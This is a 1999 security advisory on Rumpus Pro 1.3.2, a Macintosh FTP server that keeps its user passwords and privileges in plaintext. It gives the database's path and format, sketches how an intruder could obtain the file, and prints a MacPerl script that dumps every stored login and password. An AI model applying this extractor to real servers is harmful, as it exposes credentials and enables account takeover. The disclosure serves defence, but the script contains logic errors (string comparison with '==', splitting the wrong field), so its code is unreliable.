Author: Epic <epic@msec.net>
Released: 07.15.99
ABSTRACT
Rumpus Pro 1.3.2, a commercial Macintosh FTP server is a simple, easy to use solution to allow users to upload and download files. Rumpus Pro 1.3.2 allows the option to have anonymous users connect, along with "privilaged" accounts to be setup that allow "privilaged" users to be able to upload/download/rename/move/etc files. These types of accounts require passwords for the user to connect. However, the user accounts, privilages and passwords are stored in a file in plaintext.
DETAILS
The default path to the Rumpus User Database file is Macintosh HD:System Folder:Preferences:Rumpus Folder:Rumpus User Database where Macintosh HD is the name of the Startup volume.
When the User Database is opened using HexEdit or a similar hexadecimal editing utility, the file will look something like this:
ANONYMOUS..ROOT.NYYYYYYY.0
epic.password.ROOT.NYYYYYYY.0 (Notice that the Password is in Plaintext)
breaking this down "ANONYMOUS" is the login name, .. shows that the password is null. (Notice that the password for epic's account is "password") The "NYYYYYYY" is the user privilages and the 0 shows that the users has unlimited amount of disk space for his or her drop box.
Now if Rumpus is set up properly, keeping the User Database out of the wrong hands is fairly easy, however, a misconfigured copy of Rumpus could put the User Database readily available for downloading, and from their with little effort, a potential intruder could gain trusted acccess on your system. Another possible method of exploiting this security vulnerability is that if a potential intruder could get you to run untrusted source (a trojan type of application) the User Data could be mailed out or copied to a public directory on the FTP server. If rumpus is also set up for remote administration via http, an intruder with "privilaged" accounts could create new accounts, change account password's along with other functions.
I wrote a simple perl script that will dissect the User Database and display a list of
User Information:
-- Cut Here --
# Rumpus User Database Dissector
# Written by Epic, A Member of mSec
# Requires MacPerl 5 to Run, Will Need modification to run under Different Platforms
# http://www.msec.net
#!perl -w
$file = MacPerl::Ask("Location of Rumpus User Database:");
open(DATA, $file) or die print "Unable to Open: " . $file . "\n";
print "Looking for User Information in the Rumpus User Database File\n\n";
while(<DATA>)
{
($login, $password, $directory, $privilages, $disk_space) = split(/\x09/);
print " Login Name: $login\n";
print " Password: $password\n";
print "Home Directory: $directory\n";
($drop, $down, $up, $delfile, $folder, $delfolder, $permit, $dirlist) = split(//);
print " Privilages: ";
if($drop == "Y")
{
print "User Restricted to Drop Folder\n";
}
if($down == "Y")
{
print " Can Download Files\n";
}
if($up == "Y")
{
print " Can Upload Files\n";
}
if($delfile == "Y")
{
print " Can Delete and Overwrite Files\n";
}
if($folder == "Y")<B>
{
print " Can Create New Folder\n";
}
if($delfolder == "Y")
{
print " Can Delete Folders\n";
}
if($permit == "Y")
{
print " Login Permitted\n";
}
if($dirlist == "Y")
{
print " Allowed Directory Listing\n";
}
if ($disk_space == 0)
{
$disk_space = "Unlimited";
}
print " Disk Space: $disk_space Megabytes\n\n";
}
-- Cut Here --
In conclusion, the Rumpus FTP server is "secure" to an extent, however, under certain circumstances, the lack of an encrypted password scheme could put your server at risk.
WORKAROUND
N/A
Epic <epic@msec.net>
http://www.msec.net
|
Rumpus Pro 1.3.2 Vulnerability